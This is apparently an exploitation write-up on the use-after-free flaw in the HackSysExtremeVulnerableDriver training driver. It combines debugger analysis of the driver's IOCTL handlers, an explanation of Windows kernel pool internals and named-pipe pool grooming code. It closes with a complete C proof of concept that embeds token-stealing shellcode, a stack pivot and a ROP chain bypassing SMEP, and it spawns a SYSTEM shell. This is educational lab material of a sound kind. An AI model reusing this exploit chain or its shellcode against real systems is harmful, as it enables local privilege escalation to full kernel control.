Let’s begin with the first function which is AllocateUaFObjectNonPagedPoolIoctlHandler function, which makes a call to AllocateUaFObjectNonPagedPool and this call does not takes any arguments.

Diving into AllocateUaFObjectNonPagedPool function, it calls ExAllocatePoolWithTag() API, which usually takes 3 arguments,

PoolType is the type of pool memory to allocate. By using xor ecx, ecx (1️⃣) it makes ECX register as zero, which means it’s a NonPagedPool (it cannot be paged out).
NumberOfBytes (2️⃣), as the name suggests is the number of bytes to allocate.
Tag (3️⃣), this is the pool tag for the allocated memory, this is ASCII character in reverse order, here it’s 0x6B636148 which is “Hack” in reverse “kcaH”. The tag have a limit of 4 characters. The purpose of the tag is to determine if any memory is leaked. In user-mode application, if the application is force closed or crashed, kernel will clean up it’s memory but it’s not the case in kernel.

After the call to ExAllocatePoolWithTag(), the return value (RAX) which is the pointer to the allocated region is copied to RDI register (4️⃣).

PVOID ExAllocatePoolWithTag(
  [in] __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
  [in] SIZE_T                                         NumberOfBytes,
  [in] ULONG                                          Tag
);

Following that, it calls memset 1️⃣ which also takes 3 arguments. Using memset it tries to fill the allocated region with A’s. Then it stores the pointer of the allocated region from RDI to a global variable g_UseAfterFreeObjectNonPagedPool 2️⃣.

Made a POC to make a call to AllocateUaFObjectNonPagedPool function, let’s do some dynamic analysis:

1️⃣ call to AllocateUaFObjectNonPagedPool function and 2️⃣ is the call to ExAllocatePoolWithTag() API and 3️⃣ we can see all the 3 arguments where RDX is the size of the allocated region is 0x60 bytes.
Stepping over the call to ExAllocatePoolWithTag(), the return value RAX 4️⃣ holds the address of the newly allocated non-paged region. It’s filled with random chunks for now.

Moving on to the call to memset() 1️⃣, it also takes 3 arguments where RCX register is the pointer to the region allocated by ExAllocatePoolWithTag() but with <Allocated_Region> + 0x8 as destination address (2️⃣) and stepping over the call, we can see (3️⃣) the region is filled with A’s. But it didn’t fill first 0x8 bytes, and the last 0x4 bytes, but fills the rest of them (0x54) with A’s. This could be a structure where first 8 bytes are used for something else and next 0x54 bytes are char type.

From IDA I couldn’t see much about whether it’s a structure or not, maybe the symbols are broken or something, so I checked the source code and ExAllocatePoolWithTag() is actually type cast to USE_AFTER_FREE_NON_PAGED_POOL structure. This structure contains 2 members, where the first member is a pointer (8 bytes) and next member is a char type of 0x54 bytes in size, so what we see above is correct.

typedef struct _USE_AFTER_FREE_NON_PAGED_POOL
{
    FunctionPointer Callback;
    CHAR Buffer[0x54];
} USE_AFTER_FREE_NON_PAGED_POOL, *PUSE_AFTER_FREE_NON_PAGED_POOL;

WinDBG has an extension !poolused that displays all the memory based on the tag and you can also specify the tag and using !poolfind <TAG> we can also find the specific tag but it will take a lot of time. We know that the above ExAllocatePoolWithTag() call uses “Hack” as tag and I was able to find that as well.

 1: kd> !poolused
unable to get nt!PspSessionIdBitmap
Using a machine size of ffe7f pages to configure the kd cache

*** CacheSize too low - increasing to 64 MB

Max cache size is       : 67108864 bytes (0x10000 KB) 
Total memory in cache   : 10600 bytes (0xb KB) 
Number of regions cached: 23
99 full reads broken into 110 partial reads
    counts: 81 cached/29 uncached, 73.64% cached
    bytes : 41949 cached/9120 uncached, 82.14% cached
** Transition PTEs are implicitly decoded
** Prototype PTEs are implicitly decoded
..
 Sorting by Tag

               NonPaged                  Paged
 Tag     Allocs         Used     Allocs         Used
 Hack         1           96          0            0	UNKNOWN pooltag 'Hack', please update pooltag.txt

[::]

FreeUaFObjectNonPagedPool

Now the second function is FreeUaFObjectNonPagedPoolIoctlHandler which makes a call to FreeUaFObjectNonPagedPool and it also does not take any arguments, so there will be no user input required for this call.

Inside FreeUaFObjectNonPagedPool function:

1️⃣ Checks if the global variable g_UseAfterFreeObjectNonPagedPool is not null, recall in AllocateUaFObjectNonPagedPool function, it stored the pointer of the allocated region (ExAllocatePoolWithTag()) in the global variable g_UseAfterFreeObjectNonPagedPool.
Since we already made the call to AllocateUaFObjectNonPagedPool, it won’t take the jump.
In 2️⃣ it makes a call to ExFreePoolWithTag() which deallocates a block of pool memory allocated with the specified tag. This takes 2 arguments which is the pointer to the region (RCX) 3️⃣ and the tag (Hack) (EDX) 4️⃣.

void ExFreePoolWithTag(
  [in] PVOID P,
  [in] ULONG Tag
);

This is where the first issue raises, after the call to ExFreePoolWithTag(), it deallocates the block but it didn’t NULL the g_UseAfterFreeObjectNonPagedPool global variable.

Started dynamic analysis on FreeUaFObjectNonPagedPool function:

1️⃣ HEVD+0x83008 is the global variable which holds the address of the allocated region.
2️⃣ Begins the ExFreePoolWithTag() call and it takes 2 arguments (3️⃣) which takes the address of the allocated region and the Tag (”Hack”).
4️⃣ We can also confirm that the region holds the A’s which was assigned using memset() in AllocateUaFObjectNonPagedPool.
Stepping over the call, by checking the region again (5️⃣) it’s freed.
But the issue here is the global variable (g_UseAfterFreeObjectNonPagedPool) is not set to NULL and we can see (6️⃣) it still holds the pointer to the region.

UseUaFObjectNonPagedPool

Moving on to the next step, UseUaFObjectNonPagedPoolIoctlHandler function calls to UseUaFObjectNonPagedPool, like previous function calls it also does not take any arguments.

Inside UseUaFObjectNonPagedPool function,

(1️⃣) It checks if the global variable (g_UseAfterFreeObjectNonPagedPool) is not null, if not, it won’t take the jump, then (2️⃣) it copies the global variable (g_UseAfterFreeObjectNonPagedPool) to RAX register.
And (3️⃣) dereference the RAX to RCX register, which means it copies the first 8 bytes of value in the allocated region to RCX register. Finally it calls the RCX register (4️⃣).
This means whatever placed in first 8 bytes of the global variable (g_UseAfterFreeObjectNonPagedPool) will be called by the driver. If you recall earlier, we saw it’s a USE_AFTER_FREE_NON_PAGED_POOL structure where first member is a pointer (8 bytes), so basically it executes that pointer.
This leads to UAF vulnerability by re-using the same pointer without it sets to NULL.

Let’s dynamically test this now, by calling AllocateUaFObjectNonPagedPool first and then call UseUaFObjectNonPagedPool, we don’t want to free the memory now. We just want to know if the first 8 bytes can be invoked.

Placed breakpoint on the call to UseUaFObjectNonPagedPool() (1️⃣) and another breakpoint where it copies the global variable (g_UseAfterFreeObjectNonPagedPool) to RAX register (2️⃣). We can also check the global value (3️⃣) and it contains the A’s and the first 8 bytes contains some pointer (4️⃣). Moving forward it performs the dereference (5️⃣) and copies the first 8 bytes to RCX register and we can also confirm that by checking the RCX register (6️⃣) and finally it makes a call to RCX register (7️⃣).

Now that we have basic understanding of how these functions work, we need to begin the attack by allocating the memory using AllocateUaFObjectNonPagedPool and then free that using FreeUaFObjectNonPagedPool, now the memory is freed but the global variable (g_UseAfterFreeObjectNonPagedPool) still holds the pointer to that address, so we somehow re-claim the freed memory and place our payload and then finally call UseUaFObjectNonPagedPool which will call the pointer (first 8 bytes) in the global variable (g_UseAfterFreeObjectNonPagedPool).

AllocateFakeObjectNonPagedPool

We need to somehow re-claim the freed memory, there is a function called AllocateFakeObjectNonPagedPoolIoctlHandler, which takes user argument (1️⃣) from _IO_STACK_LOCATION structure, if you recall in previous posts I explained that _IO_STACK_LOCATION + 0x20 is DeviceIoControl→Type3InputBuffer which is the user input and then it makes the call to AllocateFakeObjectNonPagedPool function.

The pointer to user input (UserFakeObject) is stored to RSI register:

Moving on, there is ExAllocatePoolWithTag() call and it takes 3 arguments which are pretty similar to what we saw previously:

PoolType is the type of pool memory to allocate. By using xor ecx, ecx (1️⃣) it makes ECX register as zero, which means it’s a NonPagedPool (it cannot be paged out).
NumberOfBytes (2️⃣), as the name suggests is the number of bytes to allocate.
Tag (3️⃣), this is the pool tag for the allocated memory, this is ASCII character in reverse order, here it’s 0x6B636148 which is “Hack” in reverse “kcaH”.
After the call, the return value EAX (5️⃣) is stored to RDI register.

Moving forward, it makes a call (1️⃣) to ProbeForRead() which checks that a user-mode buffer actually resides in the user-space and accessible. As we can see it provides the UserFakeObject (the user input == RSI) as the Address to check.

Then comes a whole lot of copy stuff (2️⃣):

It uses XMM registers here, which are 16 bytes (0x10) registers.
MOVUPS instruction its like normal MOV instruction to copy values but specifically used for XMM registers.
Let’s start with first MOVUPS instruction, we already know RSI holds the user input, basically it copies first 16 bytes of user input to XMM0 register. Then from XMM0 register it copies to RDI which is the address of the NonPaged pool allocated in previous step using ExAllocatePoolWithTag().
Then it copies the next 16 bytes of user input to XMM1 register and from XMM1 to RDI+0x10, basically copies the user-input to the newly allocated region.
In the rest of the instructions it copies the remaining user input, but at the end it copies QWORD of RSI + 0x50 (which is 8 bytes) to XMM1 register. Then it copies from XMM1 to the RDI + 0x50 using MOVSD instruction which means copy lower 8 bytes, because XMM1 is 16 bytes but in previous instruction we just copied 8 bytes (QWORD)
And adds a null byte at the end of buffer (3️⃣). This concludes, it copies total of 88 bytes (0x58 bytes) of user input.

Let’s try this out, this time, I am just calling AllocateFakeObjectNonPagedPool function and see how it goes. From the copy process using XMM registers, it copies 0x58 bytes of user inputs, so I sent 88 bytes (0x58) of A’s and see how it goes.

 CHAR buffer[88];
 memset(buffer, 'A', 88);

 success = DeviceIoControl(
     hDriver,
     ALLOCATE_FAKE_NON_PAGED,
     buffer,
     sizeof(buffer),
     nullptr,
     0,
     nullptr,
     nullptr);

Placed the breakpoint on the ExAllocatePoolWithTag() (1️⃣) and got the hit, checking the parameters (2️⃣), we can see the second argument (RDX = NumberOfBytes) is 0x58 bytes (88 bytes), so now it makes sense, it allocates 0x58 bytes of NonPagedPool and copy the same amount of user input to this region.

Stepping over the call, RAX holds the address (3️⃣) of the nonpaged allocated region and checking that region contains chunks (4️⃣ explained more about this later).

Moving on to ProbeForRead() call (1️⃣), the RCX register (2️⃣) holds the user-space address which contains the A buffer we sent (3️⃣).

Then we enter the copy operation, it copies first 16 bytes of user input to XMM0 register (1️⃣), then if we check (2️⃣) the XMM0 register, we can see it holds the 16 bytes of A’s and it copies to NonPagedPool region (3️⃣). We can also confirm by checking the RDI register where the first 16 bytes are overwritten by our input (4️⃣).

Finally, it copies the null terminator (1️⃣) to the end of the buffer and we can also confirm it (2️⃣).

So AllocateFakeObjectNonPagedPool function help us to allocate a NonPagedPool region of 0x58 bytes and copy user input buffer to that newly allocated region. But how can we use this functionality to re-claim the freed memory?

Before that, we need to know a little bit about memory management.

As I explained earlier, VirtualAlloc() allocates memory in a page (4KB) and allocating a whole page for a small chunk of memory (like 50 bytes) would be highly inefficient and wasteful. To address this Heap Manager is introduced which allocate memory in smaller bytes of the required memory instead of whole page. In user-mode it’s called as Heap and it's a dynamic allocation memory, meaning it can be extended (or shrink) when required. Such example is malloc.

Like user-space heap, for kernel-space it’s called Kernel Pool, it is also a dynamic allocation memory, the pool is the heap reserved to the kernel land. There are two distinct types of pool memory: paged and non-paged. As you already know:

Paged Pool: This memory that can be swapped to disk when not in use.
Non-Paged Pool: This memory is guaranteed to reside in physical memory at all times.

For allocating memory in the pool, the main functions for allocating is ExAllocatePoolWithTag() and freeing memory is ExFreePoolWithTag(), in the Windows kernel.

If you recall earlier, ExAllocatePoolWithTag() has a member called PoolType which is a POOL_TYPE enum. As you can see below, there are multiple Pool types but most them are just the variants of NonPagedPool or PagedPool. For example NonPagedPoolNx is no-execute (NX) nonpaged pool.

Microsoft suggests not to use ExAllocatePoolWithTag() anymore, it has been deprecated in Windows 10, version 2004 and has been replaced by ExAllocatePool2.

When we NonPagedPool is allocated, the memory manager will decide the pool region for the allocated memory. A pool region refers to a larger contiguous section of memory. Inside this pool region, it contains small chunks/blocks of allocated memory.

Once we allocate 0x60 bytes using AllocateUaFObjectNonPagedPool function, we can check the address of the allocated region using !pool command. As you can see it says the region is Nonpaged pool and shows a whole lot of other blocks in the region and this pool region contains our allocated block as well.

Also as you might noticed the size is 0x70 of “Hack”, this is because each pool chunk is prepended with a 0x10 bytes of _POOL_HEADER. This is like a metadata for the chunk, as you can see there is PoolTag and ProcessBilled is a pointer to EPROCESS structure of the process that made the allocation.

//0x10 bytes (sizeof)
struct _POOL_HEADER
{
    union
    {
        struct
        {
            USHORT PreviousSize:8;                                          //0x0
            USHORT PoolIndex:8;                                             //0x0
            USHORT BlockSize:8;                                             //0x2
            USHORT PoolType:8;                                              //0x2
        };
        ULONG Ulong1;                                                       //0x0
    };
    ULONG PoolTag;                                                          //0x4
    union
    {
        struct _EPROCESS* ProcessBilled;                                    //0x8
        struct
        {
            USHORT AllocatorBackTraceIndex;                                 //0x8
            USHORT PoolTagHash;                                             //0xa
        };
    };
};

When memory region is dynamically allocated and then freed, it goes into a “free page list”. These free pages are still holding some information they’ve held when they were being used or it can be chunks too. And if Kernel or Kernel drivers looking for some physical memory (NonPagedPool) it will be taken from free page list. This is to reduce the overhead of frequent memory allocation and deallocation.

So that means, AllocateUaFObjectNonPagedPool allocates 0x60 bytes and we free that using FreeUaFObjectNonPagedPool, and after that we allocate 0x58 bytes using AllocateFakeObjectNonPagedPool, there might be a chance from the free page list, we may or may not get the same block.

Trying this out, we can see the blocks are almost nearby so atleast from same pool region. But this is not enough to exploit this vulnerability.

Exploitation

To exploit this UAF vulnerability and re-claim the freed memory, we will be using a technique called Kernel FengShui, added the reference below with all articles based on this. We are gonna specifically follow this methodology:

Source: https://elhacker.info/manuales/Análisis de malware/BlackHat_DC_2011_Mandt_kernelpool-wp.pdf

Using Kernel Fengshui or Kernel Grooming technique, we try to allocate NonPaged blocks/chunks using kernel objects with the same size as what we are trying to re-claim, in our case it’s 0x60 bytes. So we need to find a kernel object which is almost the similar size of it. There is an excellent research by Alex Ionescu on Kernel Fengshui. Using CreatePipe() and WriteFile() API it’s possible to create a “File” kernel object and we can also adjust the size of the allocation and this object will be allocated with a tag: “NpFr”.

To try this out, I created the following script:

To check how many bytes we can allocate, I started with 0x20 bytes of A’s.
Also, placed 2 getchar() before and after WriteFile() API. We need to determine the allocation size, because the named pipe will prefix our buffer with its own internal header, which is called DATA_ENTRY. And it’s an undocumented structure, so we need to determine it’s size as well.

#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>

int main() {

    HANDLE rPipe;
    HANDLE wPipe;
    DWORD outLength;

    CHAR buffer[0x20];
    memset(buffer, 'A', 0x20);

    if (!CreatePipe(&rPipe, &wPipe, NULL, sizeof(buffer))) {
        printf("Error: CreatePipe");
    }
    printf("CreatFile Handle : 0x%llx\n", rPipe);

    getchar();

    printf("WriteFile Handle : 0x%llx\n", wPipe);

    if (!WriteFile(wPipe, buffer, sizeof(buffer), &outLength, NULL)) {
        printf("Error: WriteFile");
    }

    getchar();
}

Executed the script and after the execution of CreatePipe(), I checked the NpFr tag pool and it’s empty. Because we didn’t write it yet.

0: kd> !poolused 1 NpFr
Using a machine size of ffe7f pages to configure the kd cache
..
 Sorting by Tag

                            NonPaged                                         Paged
 Tag       Allocs       Frees      Diff         Used       Allocs       Frees      Diff         Used

 NpFr        6315        6315         0            0            0           0         0            0	DATA_ENTRY records (read/write buffers) , Binary: npfs.sys

TOTAL        6315        6315         0            0            0           0         0            0

Stepping forward to the execution of WriteFile(), we can see it’s allocated with 96 bytes (0x60). And we allocated 0x20 bytes of A’s which means the DATA_ENTRY is of 0x40 bytes in size.

0: kd> !poolused 2 NpFr
Using a machine size of ffe7f pages to configure the kd cache
..
 Sorting by NonPaged Pool Consumed

               NonPaged                  Paged
 Tag     Allocs         Used     Allocs         Used

 NpFr         1           96          0            0	DATA_ENTRY records (read/write buffers) , Binary: npfs.sys

TOTAL         1           96          0            0

Also, it might be confusing to see !poolused command shows in decimal value but !pool command shows in hexadecimal. To clear this I also checked the Hack tag using !poolused and it’s clear it follows decimal (112 bytes == 0x70 bytes).

Now that we can control the size of the pool, we need to increase our buffer to 0x30 bytes and then the Nonpaged pool will be 0x70 bytes. If you recall earlier, every block is prepended with _POOL_HEADER structure (0x10), so we need to allocate some space for that too. But why we are doing this again? We are trying to create a replication of “Hack” tag pool and then we can use the Kernel Fengshui technique.

#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>

int main() {

    HANDLE rPipe;
    HANDLE wPipe;
    DWORD outLength;

    CHAR buffer[0x30];
    memset(buffer, 'A', 0x30);

    if (!CreatePipe(&rPipe, &wPipe, NULL, sizeof(buffer))) {
        printf("Error: CreatePipe");
    }
    printf("CreatFile Handle : 0x%llx\n", rPipe);
    printf("WriteFile Handle : 0x%llx\n", wPipe);

    if (!WriteFile(wPipe, buffer, sizeof(buffer), &outLength, NULL)) {
        printf("Error: WriteFile");
    }

    getchar();
}

Now everything seems good:

This is what we gonna do:

First we gonna allocate lot of DATA_ENTRY objects of 0x70 bytes using CreatePipe() and WriteFile() API. This can be done by calling these APIs a definite number of times. This process is called Defragmentation, which helps to reorganizing the data of related pieces to be placed together in a contiguous sections.
Followed that we gonna allocate a few more DATA_ENTRY objects and we expect in this process that all the objects are stored in sequential.

Then we free every second DATA_ENTRY object of the sequential allocations only to create holes.

Finally we allocate the 0x60 bytes of Hack using AllocateUaFObjectNonPagedPool, we hope this lands in one of the holes we placed. And this region address is stored in the global variable (g_UseAfterFreeObjectNonPagedPool).

And free that memory using FreeUaFObjectNonPagedPool, but the global variable (g_UseAfterFreeObjectNonPagedPool) is not set to NULL which still holds the pointer to the region (blue).

Then we allocate a lot of the malicious object using AllocateFakeObjectNonPagedPool and fill every holes where one of the hole is the address of g_UseAfterFreeObjectNonPagedPool and finally execute it using UseUaFObjectNonPagedPool.

To begin with, we need to call the CreatePipe() and WriteFile() APIs a definite number of times. This for loop repeatedly calls these APIs for HANDLE_COUNT iterations.

    for (int i = 0; i < HANDLE_COUNT; i++) {
        if (!CreatePipe(&rPipes[i], &wPipes[i], NULL, sizeof(buffer))) {
            printf("Error: CreatePipe failed at iteration %d\n", i);
            break;
        }

        if (!WriteFile(wPipes[i], buffer, sizeof(buffer), &outLength, NULL)) {
            printf("Error: WriteFile failed at iteration %d\n", i);
            break;
        }
    }

We can create the hole by closing every second handle:

for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
        if (i % 2 == 0) {
            CloseHandle(srPipes[i]);
            CloseHandle(swPipes[i]);
        }
    }

We know that UseUaFObjectNonPagedPool executes a pointer from g_UseAfterFreeObjectNonPagedPool. So, when creating a fake object using AllocateFakeObjectNonPagedPool, I filled it with B’s to see if I can make it execute that. This also needs to be done a definite number of times (ALLOCATE_HANDLE_COUNT) to fill every hole, with one of the holes being the pointer g_UseAfterFreeObjectNonPagedPool.

    printf("[+] Calling AllocateFakeObjectNonPagedPool....\n");
    printf("[+] Filling the holes with fake objects..\n");

    CHAR buffer[0x58];
    memset(buffer, 'B', 0x58);

    for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
        success = DeviceIoControl(
            hDriver,
            ALLOCATE_FAKE_NON_PAGED,
            buffer,
            sizeof(buffer),
            nullptr,
            0,
            nullptr,
            nullptr);
    }

Placed a breakpoint on the UseUaFObjectNonPagedPool function when it executes the pointer from g_UseAfterFreeObjectNonPagedPool and when I run it first time, the RCX is not overwritten but when I re-run the code, it worked and overwritten the RCX.

I used the same fake stack pivot method as what I explained in type confusion vulnerability. So that UseUaFObjectNonPagedPool will execute our stack pivot gadget and pivot to user-space and then execute the rest of the ROP gadgets which will bypass the SMEP & VBS (HVCI is disabled in this scenario) and spawn SYSTEM shell.

The defragmentation and allocation process sometimes takes 1 or 2 attempts but that won’t crash the machine, but IRQL_NOT_LESS_OR_EQUAL crash occurs after the execution of stack pivot but as I explained earlier it’s not always, only when the IRQL is higher and we can still execute our shellcode in user-space.

Final POC:

#include <Windows.h>
#include <stdio.h>
#include <psapi.h>

#define ALLOCATE_UAF_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x804, METHOD_NEITHER, FILE_ANY_ACCESS)
#define FREE_UAF_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x806, METHOD_NEITHER, FILE_ANY_ACCESS)
#define USE_UAF_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x805, METHOD_NEITHER, FILE_ANY_ACCESS)
#define ALLOCATE_FAKE_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x807, METHOD_NEITHER, FILE_ANY_ACCESS)

#define HANDLE_COUNT 20000
#define ALLOC_HANDLE_COUNT 80000
#define FAKE_ALLOC_COUNT ALLOC_HANDLE_COUNT / 2

int fengshui() {
    HANDLE* rPipes = (HANDLE*)malloc(HANDLE_COUNT * sizeof(HANDLE));
    HANDLE* wPipes = (HANDLE*)malloc(HANDLE_COUNT * sizeof(HANDLE));
    HANDLE* srPipes = (HANDLE*)malloc(ALLOC_HANDLE_COUNT * sizeof(HANDLE));
    HANDLE* swPipes = (HANDLE*)malloc(ALLOC_HANDLE_COUNT * sizeof(HANDLE));
    if (rPipes == NULL || wPipes == NULL || srPipes == NULL || swPipes == NULL) {
        printf("Error: Memory allocation failed\n");
        return 1;
    }

    CHAR buffer[0x30];
    DWORD outLength;

    memset(buffer, 'A', sizeof(buffer));

    printf("[+] Phase I: Performing Defragmentation for the object....\n");

    for (int i = 0; i < HANDLE_COUNT; i++) {
        if (!CreatePipe(&rPipes[i], &wPipes[i], NULL, sizeof(buffer))) {
            printf("Error: CreatePipe failed at iteration %d\n", i);
            break;
        }

        if (!WriteFile(wPipes[i], buffer, sizeof(buffer), &outLength, NULL)) {
            printf("Error: WriteFile failed at iteration %d\n", i);
            break;
        }
    }

    printf("[+] Phase II: Allocating objects in sequence....\n");

    for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
        if (!CreatePipe(&srPipes[i], &swPipes[i], NULL, sizeof(buffer))) {
            printf("Error: CreatePipe failed at iteration %d\n", i);
            break;
        }

        if (!WriteFile(swPipes[i], buffer, sizeof(buffer), &outLength, NULL)) {
            printf("Error: WriteFile failed at iteration %d\n", i);
            break;
        }
    }

    printf("[+] Phase III: Creating holes in the pool...\n");
    for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
        if (i % 2 == 0) {
            CloseHandle(srPipes[i]);
            CloseHandle(swPipes[i]);
        }
    }
    //free(rPipes);
    //free(wPipes);
    //free(srPipes);
    //free(swPipes);
    return 0;
}

PVOID getbaseaddress()
{
    BOOL status;
    LPVOID* pImageBase;
    DWORD ImageSize;

    status = EnumDeviceDrivers(nullptr, 0, &ImageSize);

    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

    status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);

    LPVOID ntaddr = pImageBase[0];

    return ntaddr;
}

uintptr_t MiGetPte(LPVOID lpMemory) {
    uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory);

    uintptr_t calc1 = addr >> 9; // shr rcx, 9 
    uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx

    return calc2;
}

int main()
{
    NTSTATUS success;

    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %d", GetLastError());
        return 1;
    }

    printf("[+] Performing Pool grooming...\n");
    fengshui();

    printf("[+] Calling AllocateUaFObjectNonPagedPool....");

    success = DeviceIoControl(
        hDriver,
        ALLOCATE_UAF_NON_PAGED,
        nullptr,
        0,
        nullptr,
        0,
        nullptr,
        nullptr);

    printf("success\n");

    printf("[+] Calling FreeUaFObjectNonPagedPool....");

    success = DeviceIoControl(
        hDriver,
        FREE_UAF_NON_PAGED,
        nullptr,
        0,
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed: %d\n", GetLastError());
    }

    LPVOID nt_addr = getbaseaddress();
    printf("[+] Nt base address: %p\n", nt_addr);

    BYTE shellcode[256] = {
    0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
    0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
    0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
    0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
    0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
    0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
    0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
    0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
    0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
    0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
    0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
    0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
    0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
    0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff
    };

    LPVOID lpMemory = VirtualAlloc(NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
    printf("[+] Shellcode address: %p\n", lpMemory);
    memcpy(lpMemory, shellcode, sizeof(shellcode));

    uintptr_t ShellcodePte = MiGetPte(lpMemory);
    printf("[+] PTE calculated shellcode address: %p\n", (void*)ShellcodePte);

    printf("[+] Calling AllocateFakeObjectNonPagedPool....\n");
    printf("[+] Filling the holes with fake objects..\n");

    CHAR buffer[0x58];
    *(LPVOID*)(buffer) = (LPVOID)((uintptr_t)nt_addr + 0x0059f24e); // mov esp, 0x83000000 ; ret
    memset(buffer + 0x8, 'B', 0x50);

    uintptr_t STACK_PIVOT = 0x83000000;
    LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("[+] Allocated region: %p\n", fakeStack);
    if (!VirtualLock(fakeStack, 0x10000)) {
        printf("Error using VirtualLock: %d\n", GetLastError());
    }

    memset((LPVOID)fakeStack, 0x10000, '\x41');
    int index = 0;
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00202e71); // pop rcx; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)ShellcodePte; // Shellcode in user-mode
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201862); // pop rax; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // nt!MiGetPteAddress+0x13
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027bcbf); // mov rax, qword ptr [rax]; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0020e204); // add rax, rcx; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201861); // pop r8 ; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)(0xfffffffffffffffc); // -4
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x003fd49b); // add qword ptr [rax], r8 ; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = lpMemory; // Shellcode in user-mode

    for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
        success = DeviceIoControl(
            hDriver,
            ALLOCATE_FAKE_NON_PAGED,
            buffer,
            sizeof(buffer),
            nullptr,
            0,
            nullptr,
            nullptr);
    }

    printf("[+] Calling UseUaFObjectNonPagedPool....");

    success = DeviceIoControl(
        hDriver,
        USE_UAF_NON_PAGED,
        nullptr,
        0,
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed: %d\n", GetLastError());
    }

    printf("[+] Spawning a shell with elevated privileges\n\n");
    system("cmd");

    // close handle
    printf("[+] Closing handle\n");
    CloseHandle(hDriver);
}

References:

Type Confusion:

Use-After-Free: